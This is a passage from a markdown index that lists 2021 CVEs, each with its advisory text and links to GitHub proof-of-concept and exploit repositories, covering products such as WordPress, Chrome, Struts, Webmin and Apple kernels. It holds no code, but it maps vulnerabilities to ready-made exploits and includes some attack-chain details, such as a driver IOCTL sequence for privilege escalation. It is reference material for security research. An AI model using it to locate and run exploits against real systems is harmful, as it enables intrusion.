[Vulnmachines/wordpress_cve-2021-29447](https://github.com/Vulnmachines/wordpress_cve-2021-29447) +- [dnr6419/CVE-2021-29447](https://github.com/dnr6419/CVE-2021-29447) +- [AssassinUKG/CVE-2021-29447](https://github.com/AssassinUKG/CVE-2021-29447) +- [b-abderrahmane/CVE-2021-29447-POC](https://github.com/b-abderrahmane/CVE-2021-29447-POC) +- [elf1337/blind-xxe-controller-CVE-2021-29447](https://github.com/elf1337/blind-xxe-controller-CVE-2021-29447) +- [Val-Resh/CVE-2021-29447-POC](https://github.com/Val-Resh/CVE-2021-29447-POC) +- [M3l0nPan/wordpress-cve-2021-29447](https://github.com/M3l0nPan/wordpress-cve-2021-29447) +- [mega8bit/exploit_cve-2021-29447](https://github.com/mega8bit/exploit_cve-2021-29447) +- [thomas-osgood/CVE-2021-29447](https://github.com/thomas-osgood/CVE-2021-29447) +- [Abdulazizalsewedy/CVE-2021-29447](https://github.com/Abdulazizalsewedy/CVE-2021-29447) +- [G01d3nW01f/CVE-2021-29447](https://github.com/G01d3nW01f/CVE-2021-29447) +- [viardant/CVE-2021-29447](https://github.com/viardant/CVE-2021-29447) +- [0xRar/CVE-2021-29447-PoC](https://github.com/0xRar/CVE-2021-29447-PoC) +- [andyhsu024/CVE-2021-29447](https://github.com/andyhsu024/CVE-2021-29447) + +### CVE-2021-29505 (2021-05-28) + +XStream is software for serializing Java objects to XML and back again. A vulnerability in XStream versions prior to 1.4.17 may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types is affected. The vulnerability is patched in version 1.4.17. + + +- [MyBlackManba/CVE-2021-29505](https://github.com/MyBlackManba/CVE-2021-29505) + +### CVE-2021-29627 (2021-04-07) + +In FreeBSD 13.0-STABLE before n245050, 12.2-STABLE before r369525, 13.0-RC4 before p0, and 12.2-RELEASE before p6, listening socket accept filters implementing the accf_create callback incorrectly freed a process supplied argument string. Additional operations on the socket can lead to a double free or use after free. + + +- [raymontag/cve-2021-29627](https://github.com/raymontag/cve-2021-29627) + +### CVE-2021-30005 (2021-05-11) + +In JetBrains PyCharm before 2020.3.4, local code execution was possible because of insufficient checks when getting the project from VCS. + + +- [atorralba/CVE-2021-30005-POC](https://github.com/atorralba/CVE-2021-30005-POC) + +### CVE-2021-30109 (2021-04-05) + +Froala Editor 3.2.6 is affected by Cross Site Scripting (XSS). Under certain conditions, a base64 crafted string leads to persistent Cross-site scripting (XSS) vulnerability within the hyperlink creation module. + + +- [Hackdwerg/CVE-2021-30109](https://github.com/Hackdwerg/CVE-2021-30109) + +### CVE-2021-30128 (2021-04-27) + +Apache OFBiz has unsafe deserialization prior to 17.12.07 version + + +- [LioTree/CVE-2021-30128-EXP](https://github.com/LioTree/CVE-2021-30128-EXP) + +### CVE-2021-30146 (2021-04-06) + +Seafile 7.0.5 (2019) allows Persistent XSS via the "share of library functionality." + + +- [Security-AVS/CVE-2021-30146](https://github.com/Security-AVS/CVE-2021-30146) + +### CVE-2021-30357 (2021-06-08) + +SSL Network Extender Client for Linux before build 800008302 reveals part of the contents of the configuration file supplied, which allows partially disclosing files to which the user did not have access. + + +- [joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC](https://github.com/joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC) + +### CVE-2021-30461 (2021-05-29) + +A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php. + + +- [daedalus/CVE-2021-30461](https://github.com/daedalus/CVE-2021-30461) +- [Vulnmachines/CVE-2021-30461](https://github.com/Vulnmachines/CVE-2021-30461) +- [Al1ex/CVE-2021-30461](https://github.com/Al1ex/CVE-2021-30461) +- [puckiestyle/CVE-2021-30461](https://github.com/puckiestyle/CVE-2021-30461) + +### CVE-2021-30481 (2021-04-10) + +Valve Steam through 2021-04-10, when a Source engine game is installed, allows remote authenticated users to execute arbitrary code because of a buffer overflow that occurs for a Steam invite after one click. + + +- [floesen/CVE-2021-30481](https://github.com/floesen/CVE-2021-30481) +- [JHVIW/jhviw.github.io](https://github.com/JHVIW/jhviw.github.io) + +### CVE-2021-30551 (2021-06-15) + +Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [xmzyshypnc/CVE-2021-30551](https://github.com/xmzyshypnc/CVE-2021-30551) + +### CVE-2021-30573 (2021-08-03) + +Use after free in GPU in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [s4eio/CVE-2021-30573-PoC-Google-Chrome](https://github.com/s4eio/CVE-2021-30573-PoC-Google-Chrome) +- [orangmuda/CVE-2021-30573](https://github.com/orangmuda/CVE-2021-30573) +- [kh4sh3i/CVE-2021-30573](https://github.com/kh4sh3i/CVE-2021-30573) + +### CVE-2021-30632 (2021-10-08) + +Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [Phuong39/PoC-CVE-2021-30632](https://github.com/Phuong39/PoC-CVE-2021-30632) +- [CrackerCat/CVE-2021-30632](https://github.com/CrackerCat/CVE-2021-30632) +- [maldev866/ChExp_CVE-2021-30632](https://github.com/maldev866/ChExp_CVE-2021-30632) +- [paulsery/CVE-2021-30632](https://github.com/paulsery/CVE-2021-30632) + +### CVE-2021-30641 (2021-06-10) + +Apache HTTP Server versions 2.4.39 to 2.4.46 Unexpected matching behavior with 'MergeSlashes OFF' + + +- [dja2TaqkGEEfA45/CVE-2021-30641](https://github.com/dja2TaqkGEEfA45/CVE-2021-30641) + +### CVE-2021-30657 (2021-09-08) + +A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.. + + +- [shubham0d/CVE-2021-30657](https://github.com/shubham0d/CVE-2021-30657) + +### CVE-2021-30682 (2021-09-08) + +A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak sensitive user information. + + +- [threatnix/csp-playground](https://github.com/threatnix/csp-playground) + +### CVE-2021-30731 (2021-09-08) + +This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.4, Security Update 2021-004 Catalina. An unprivileged application may be able to capture USB devices. + + +- [osy/WebcamViewer](https://github.com/osy/WebcamViewer) + +### CVE-2021-30807 (2021-10-19) + +A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.5.1, iOS 14.7.1 and iPadOS 14.7.1, watchOS 7.6.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. + + +- [jsherman212/iomfb-exploit](https://github.com/jsherman212/iomfb-exploit) +- [30440r/gex](https://github.com/30440r/gex) + +### CVE-2021-30858 (2021-08-24) + +A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. + + +- [kmeps4/CVEREV3](https://github.com/kmeps4/CVEREV3) +- [Jeromeyoung/ps4_8.00_vuln_poc](https://github.com/Jeromeyoung/ps4_8.00_vuln_poc) + +### CVE-2021-30860 (2021-08-24) + +An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. + + +- [Levilutz/CVE-2021-30860](https://github.com/Levilutz/CVE-2021-30860) +- [jeffssh/CVE-2021-30860](https://github.com/jeffssh/CVE-2021-30860) + +### CVE-2021-30937 (2021-08-24) + +A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to execute arbitrary code with kernel privileges. + + +- [realrodri/ExploiteameEsta](https://github.com/realrodri/ExploiteameEsta) + +### CVE-2021-30955 (2021-08-24) + +A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. A malicious application may be able to execute arbitrary code with kernel privileges. + + +- [timb-machine-mirrors/jakeajames-CVE-2021-30955](https://github.com/timb-machine-mirrors/jakeajames-CVE-2021-30955) +- [nickorlow/CVE-2021-30955-POC](https://github.com/nickorlow/CVE-2021-30955-POC) +- [verygenericname/CVE-2021-30955-POC-IPA](https://github.com/verygenericname/CVE-2021-30955-POC-IPA) +- [b1n4r1b01/desc_race](https://github.com/b1n4r1b01/desc_race) +- [markie-dev/desc_race_A15](https://github.com/markie-dev/desc_race_A15) +- [Dylbin/desc_race](https://github.com/Dylbin/desc_race) +- [GeoSn0w/Pentagram-exploit-tester](https://github.com/GeoSn0w/Pentagram-exploit-tester) + +### CVE-2021-30956 (2021-08-24) + +A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15.2 and iPadOS 15.2. An attacker with physical access to a device may be able to see private contact information. + + +- [fordsham/CVE-2021-30956](https://github.com/fordsham/CVE-2021-30956) + +### CVE-2021-31159 (2021-06-16) + +Zoho ManageEngine ServiceDesk Plus MSP before 10519 is vulnerable to a User Enumeration bug due to improper error-message generation in the Forgot Password functionality, aka SDPMSP-15732. + + +- [ricardojoserf/CVE-2021-31159](https://github.com/ricardojoserf/CVE-2021-31159) + +### CVE-2021-31166 (2021-05-11) + +HTTP Protocol Stack Remote Code Execution Vulnerability + + +- [0vercl0k/CVE-2021-31166](https://github.com/0vercl0k/CVE-2021-31166) +- [zha0gongz1/CVE-2021-31166](https://github.com/zha0gongz1/CVE-2021-31166) +- [mvlnetdev/CVE-2021-31166-detection-rules](https://github.com/mvlnetdev/CVE-2021-31166-detection-rules) +- [corelight/CVE-2021-31166](https://github.com/corelight/CVE-2021-31166) +- [zecopro/CVE-2021-31166](https://github.com/zecopro/CVE-2021-31166) +- [bgsilvait/WIn-CVE-2021-31166](https://github.com/bgsilvait/WIn-CVE-2021-31166) +- [y0g3sh-99/CVE-2021-31166-Exploit](https://github.com/y0g3sh-99/CVE-2021-31166-Exploit) +- [ZZ-SOCMAP/CVE-2021-31166](https://github.com/ZZ-SOCMAP/CVE-2021-31166) +- [imikoYa/CVE-2021-31166-exploit](https://github.com/imikoYa/CVE-2021-31166-exploit) +- [mauricelambert/CVE-2021-31166](https://github.com/mauricelambert/CVE-2021-31166) +- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher) + +### CVE-2021-31184 (2021-05-11) + +Microsoft Windows Infrared Data Association (IrDA) Information Disclosure Vulnerability + + +- [waleedassar/CVE-2021-31184](https://github.com/waleedassar/CVE-2021-31184) + +### CVE-2021-31233 (2023-05-31) + +SQL Injection vulnerability found in Fighting Cock Information System v.1.0 allows a remote attacker to obtain sensitive information via the edit_breed.php parameter. + + +- [gabesolomon/CVE-2021-31233](https://github.com/gabesolomon/CVE-2021-31233) + +### CVE-2021-31290 +- [qaisarafridi/cve-2021-31290](https://github.com/qaisarafridi/cve-2021-31290) + +### CVE-2021-31589 (2022-01-05) + +A cross-site scripting (XSS) vulnerability has been reported and confirmed for BeyondTrust Secure Remote Access Base Software version 6.0.1 and older, which allows the injection of unauthenticated, specially-crafted web requests without proper sanitization. + + +- [karthi-the-hacker/CVE-2021-31589](https://github.com/karthi-the-hacker/CVE-2021-31589) + +### CVE-2021-31630 (2021-08-03) + +Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application. + + +- [hev0x/CVE-2021-31630-OpenPLC_RCE](https://github.com/hev0x/CVE-2021-31630-OpenPLC_RCE) +- [Hunt3r0x/CVE-2021-31630-HTB](https://github.com/Hunt3r0x/CVE-2021-31630-HTB) +- [thewhiteh4t/cve-2021-31630](https://github.com/thewhiteh4t/cve-2021-31630) +- [behindsecurity/htb-wifinetictwo-exploit](https://github.com/behindsecurity/htb-wifinetictwo-exploit) +- [mind2hex/CVE-2021-31630](https://github.com/mind2hex/CVE-2021-31630) +- [sealldeveloper/CVE-2021-31630-PoC](https://github.com/sealldeveloper/CVE-2021-31630-PoC) +- [junnythemarksman/CVE-2021-31630](https://github.com/junnythemarksman/CVE-2021-31630) +- [adibabdala123/cve-2021-31630](https://github.com/adibabdala123/cve-2021-31630) +- [manuelsantosiglesias/CVE-2021-31630](https://github.com/manuelsantosiglesias/CVE-2021-31630) +- [FlojBoj/CVE-2021-31630](https://github.com/FlojBoj/CVE-2021-31630) + +### CVE-2021-31728 (2021-05-17) + +Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware 2.74.0.150 allows a non-privileged process to open a handle to \.\ZemanaAntiMalware, register itself with the driver by sending IOCTL 0x80002010, allocate executable memory using a flaw in IOCTL 0x80002040, install a hook with IOCTL 0x80002044 and execute the executable memory using this hook with IOCTL 0x80002014 or 0x80002018, this exposes ring 0 code execution in the context of the driver allowing the non-privileged process to elevate privileges. + + +- [irql/CVE-2021-31728](https://github.com/irql/CVE-2021-31728) + +### CVE-2021-31755 (2021-05-07) + +An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request. + + +- [r3s3tt/CVE-2021-31755](https://github.com/r3s3tt/CVE-2021-31755) + +### CVE-2021-31760 (2021-04-25) + +Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to achieve Remote Command Execution (RCE) through Webmin's running process feature. + + +- [Mesh3l911/CVE-2021-31760](https://github.com/Mesh3l911/CVE-2021-31760) +- [electronicbots/CVE-2021-31760](https://github.com/electronicbots/CVE-2021-31760) + +### CVE-2021-31761 (2021-04-25) + +Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature. + + +- [Mesh3l911/CVE-2021-31761](https://github.com/Mesh3l911/CVE-2021-31761) +- [electronicbots/CVE-2021-31761](https://github.com/electronicbots/CVE-2021-31761) + +### CVE-2021-31762 (2021-04-25) + +Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to create a privileged user through Webmin's add users feature, and then get a reverse shell through Webmin's running process feature. + + +- [Mesh3l911/CVE-2021-31762](https://github.com/Mesh3l911/CVE-2021-31762) +- [electronicbots/CVE-2021-31762](https://github.com/electronicbots/CVE-2021-31762) + +### CVE-2021-31796 (2021-09-02) + +An inadequate encryption vulnerability discovered in CyberArk Credential Provider before 12.1 may lead to Information Disclosure. An attacker may realistically have enough information that the number of possible keys (for a credential file) is only one, and the number is usually not higher than 2^36. + + +- [unmanarc/CACredDecoder](https://github.com/unmanarc/CACredDecoder) + +### CVE-2021-31800 (2021-05-05) + +Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key. + + +- [p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write](https://github.com/p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write) +- [Louzogh/CVE-2021-31800](https://github.com/Louzogh/CVE-2021-31800) + +### CVE-2021-31805 (2022-04-12) + +The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation. + + +- [pyroxenites/s2-062](https://github.com/pyroxenites/s2-062) +- [Wrin9/CVE-2021-31805](https://github.com/Wrin9/CVE-2021-31805) +- [Axx8/Struts2_S2-062_CVE-2021-31805](https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805) +- [jax7sec/S2-062](https://github.com/jax7sec/S2-062) +- [aeyesec/CVE-2021-31805](https://github.com/aeyesec/CVE-2021-31805) +- [fleabane1/CVE-2021-31805-POC](https://github.com/fleabane1/CVE-2021-31805-POC) +- [z92g/CVE-2021-31805](https://github.com/z92g/CVE-2021-31805) +- [nth347/CVE-2021-31805](https://github.com/nth347/CVE-2021-31805) + +### CVE-2021-31856 (2021-04-28) + +A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go). + + +- [ssst0n3/CVE-2021-31856](https://github.com/ssst0n3/CVE-2021-31856) + +### CVE-2021-31862 (2021-10-29) + +SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication. + + +- [RobertDra/CVE-2021-31862](https://github.com/RobertDra/CVE-2021-31862) + +### CVE-2021-31955 (2021-06-08) + +Windows Kernel Information Disclosure Vulnerability + + +- [freeide/CVE-2021-31955-POC](https://github.com/freeide/CVE-2021-31955-POC) + +### CVE-2021-31956 (2021-06-08) + +Windows NTFS Elevation of Privilege Vulnerability + + +- [hzshang/CVE-2021-31956](https://github.com/hzshang/CVE-2021-31956) +- [Y3A/CVE-2021-31956](https://github.com/Y3A/CVE-2021-31956) +- [hoangprod/CVE-2021-31956-POC](https://github.com/hoangprod/CVE-2021-31956-POC) + +### CVE-2021-32099 (2021-05-07) + +A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass. + + +- [ibnuuby/CVE-2021-32099](https://github.com/ibnuuby/CVE-2021-32099) +- [l3eol3eo/CVE-2021-32099_SQLi](https://github.com/l3eol3eo/CVE-2021-32099_SQLi) +- [akr3ch/CVE-2021-32099](https://github.com/akr3ch/CVE-2021-32099) + +### CVE-2021-32156 (2022-04-11) + +A cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature. + + +- [Mesh3l911/CVE-2021-32156](https://github.com/Mesh3l911/CVE-2021-32156) + +### CVE-2021-32157 (2022-04-11) + +A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature. + + +- [Mesh3l911/CVE-2021-32157](https://github.com/Mesh3l911/CVE-2021-32157) +- [dnr6419/CVE-2021-32157](https://github.com/dnr6419/CVE-2021-32157) + +### CVE-2021-32158 (2022-04-11) + +A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Upload and Download feature. + + +- [Mesh3l911/CVE-2021-32158](https://github.com/Mesh3l911/CVE-2021-32158) + +### CVE-2021-32159 (2022-04-11) + +A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Upload and Download feature. + + +- [Mesh3l911/CVE-2021-32159](https://github.com/Mesh3l911/CVE-2021-32159) + +### CVE-2021-32160 (2022-04-11) + +A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the Add Users feature. + + +- [Mesh3l911/CVE-2021-32160](https://github.com/Mesh3l911/CVE-2021-32160) + +### CVE-2021-32161 (2022-04-11) + +A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the File Manager feature. + + +- [Mesh3l911/CVE-2021-32161](https://github.com/Mesh3l911/CVE-2021-32161) + +### CVE-2021-32162 (2022-04-11) + +A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 through the File Manager feature. + + +- [Mesh3l911/CVE-2021-32162](https://github.com/Mesh3l911/CVE-2021-32162) + +### CVE-2021-32305 (2021-05-18) + +WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + + +- [sz-guanx/CVE-2021-32305](https://github.com/sz-guanx/CVE-2021-32305) +- [FredBrave/CVE-2021-32305-websvn-2.6.0](https://github.com/FredBrave/CVE-2021-32305-websvn-2.6.0) + +### CVE-2021-32399 (2021-05-10) + +net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI controller. + + +- [nanopathi/linux-4.19.72_CVE-2021-32399](https://github.com/nanopathi/linux-4.19.72_CVE-2021-32399) + +### CVE-2021-32471 (2021-05-10) + +Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data. For example, a tape head may have an unexpected location after the processing of input composed of As and Bs (instead of 0s and 1s). NOTE: the discoverer states "this vulnerability has no real-world implications." + + +- [intrinsic-propensity/turing-machine](https://github.com/intrinsic-propensity/turing-machine) + +### CVE-2021-32537 (2021-07-07) + +Realtek HAD contains a driver crashed vulnerability which allows local side attackers to send a special string to the kernel driver in a user’s mode. Due to unexpected commands, the kernel driver will cause the system crashed. + + +- [0vercl0k/CVE-2021-32537](https://github.com/0vercl0k/CVE-2021-32537) + +### CVE-2021-32644 (2021-06-22) + +Ampache is an open source web based audio/video streaming application and file manager. Due to a lack of input filtering versions 4.x.y are vulnerable to code injection in random.php. The attack requires user authentication to access the random.php page unless the site is running in demo mode. This issue has been resolved in 4.4.3. + + +- [dnr6419/CVE-2021-32644](https://github.com/dnr6419/CVE-2021-32644) + +### CVE-2021-32648 (2021-08-26) + +octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5. + + +- [Immersive-Labs-Sec/CVE-2021-32648](https://github.com/Immersive-Labs-Sec/CVE-2021-32648) +- [daftspunk/CVE-2021-32648](https://github.com/daftspunk/CVE-2021-32648) + +### CVE-2021-32682 (2021-06-14) + +elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. + + +- [nickswink/CVE-2021-32682](https://github.com/nickswink/CVE-2021-32682) + +### CVE-2021-32708 (2021-06-24) + +Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1. + + +- [fazilbaig1/CVE-2021-32708](https://github.com/fazilbaig1/CVE-2021-32708) + +### CVE-2021-32724 (2021-09-09) + +check-spelling is a github action which provides CI spell checking. In affected versions and for a repository with the [check-spelling action](https://github.com/marketplace/actions/check-spelling) enabled that triggers on `pull_request_target` (or `schedule`), an attacker can send a crafted Pull Request that causes a `GITHUB_TOKEN` to be exposed. With the `GITHUB_TOKEN`, it's possible to push commits to the repository bypassing standard approval processes. Commits to the repository could then steal any/all secrets available to the repository. As a workaround users may can either: [Disable the workflow](https://docs.github.com/en/actions/managing-workflow-runs/disabling-and-enabling-a-workflow) until you've fixed all branches or Set repository to [Allow specific actions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#allowing-specific-actions-to-run). check-spelling isn't a verified creator and it certainly won't be anytime soon. You could then explicitly add other actions that your repository uses. Set repository [Workflow permissions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#setting-the-permissions-of-the-github_token-for-your-repository) to `Read repository contents permission`. Workflows using `check-spelling/check-spelling@main` will get the fix automatically. Workflows using a pinned sha or tagged version will need to change the affected workflows for all repository branches to the latest version. Users can verify who and which Pull Requests have been running the action by looking up the spelling.yml action in the Actions tab of their repositories, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml - you can filter PRs by adding ?query=event%3Apull_request_target, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml?query=event%3Apull_request_target. + + +- [MaximeSchlegel/CVE-2021-32724-Target](https://github.com/MaximeSchlegel/CVE-2021-32724-Target) + +### CVE-2021-32789 (2021-07-26) + +woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading. + + +- [and0x00/CVE-2021-32789](https://github.com/and0x00/CVE-2021-32789) +- [DonVorrin/CVE-2021-32789](https://github.com/DonVorrin/CVE-2021-32789) + +### CVE-2021-32804 (2021-08-03) + +The npm package "tar" (aka node-tar) before versions 6.1.1, 5.0.6, 4.4.14, and 3.3.2 has a arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example `/home/user/.bashrc` would turn into `home/user/.bashrc`. This logic was insufficient when file paths contained repeated path roots such as `////home/user/.bashrc`. `node-tar` would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.2, 4.4.14, 5.0.6 and 6.1.1. Users may work around this vulnerability without upgrading by creating a custom `onentry` method which sanitizes the `entry.path` or a `filter` method which removes entries with absolute paths. See referenced GitHub Advisory for details. Be aware of CVE-2021-32803 which fixes a similar bug in later versions of tar. + + +- [yamory/CVE-2021-32804](https://github.com/yamory/CVE-2021-32804) + +### CVE-2021-32819 (2021-05-14) + +Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023. + + +- [Abady0x1/CVE-2021-32819](https://github.com/Abady0x1/CVE-2021-32819) + +### CVE-2021-32849 (2022-01-26) + +Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds. + + +- [bb33bb/CVE-2021-32849](https://github.com/bb33bb/CVE-2021-32849) +- [lowkey0808/cve-2021-32849](https://github.com/lowkey0808/cve-2021-32849) + +### CVE-2021-33026 (2021-05-13) + +The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code. NOTE: a third party indicates that exploitation is extremely unlikely unless the machine is already compromised; in other cases, the attacker would be unable to write their payload to the cache and generate the required collision + + +- [CarlosG13/CVE-2021-33026](https://github.com/CarlosG13/CVE-2021-33026) +- [Agilevatester/FlaskCache_CVE-2021-33026_POC](https://github.com/Agilevatester/FlaskCache_CVE-2021-33026_POC) + +### CVE-2021-33034 (2021-05-14) + +In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value. + + +- [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034) + +### CVE-2021-33044 (2021-09-15) + +The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + + +- [bp2008/DahuaLoginBypass](https://github.com/bp2008/DahuaLoginBypass) +- [Spy0x7/CVE-2021-33044](https://github.com/Spy0x7/CVE-2021-33044) +- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo) +- [haingn/LoHongCam-CVE-2021-33044](https://github.com/haingn/LoHongCam-CVE-2021-33044) + +### CVE-2021-33045 (2021-09-15) + +The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + + +- [dongpohezui/cve-2021-33045](https://github.com/dongpohezui/cve-2021-33045) + +### CVE-2021-33104 (2023-02-16) + +Improper access control in the Intel(R) OFU software before version 14.1.28 may allow an authenticated user to potentially enable denial of service via local access. + + +- [rjt-gupta/CVE-2021-33104](https://github.com/rjt-gupta/CVE-2021-33104) + +### CVE-2021-33558 (2021-05-27) + +Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa. + + +- [mdanzaruddin/CVE-2021-33558.](https://github.com/mdanzaruddin/CVE-2021-33558.) +- [anldori/CVE-2021-33558](https://github.com/anldori/CVE-2021-33558) + +### CVE-2021-33560 (2021-06-08) + +Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP. + + +- [IBM/PGP-client-checker-CVE-2021-33560](https://github.com/IBM/PGP-client-checker-CVE-2021-33560) + +### CVE-2021-33564 (2021-05-29) + +An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows 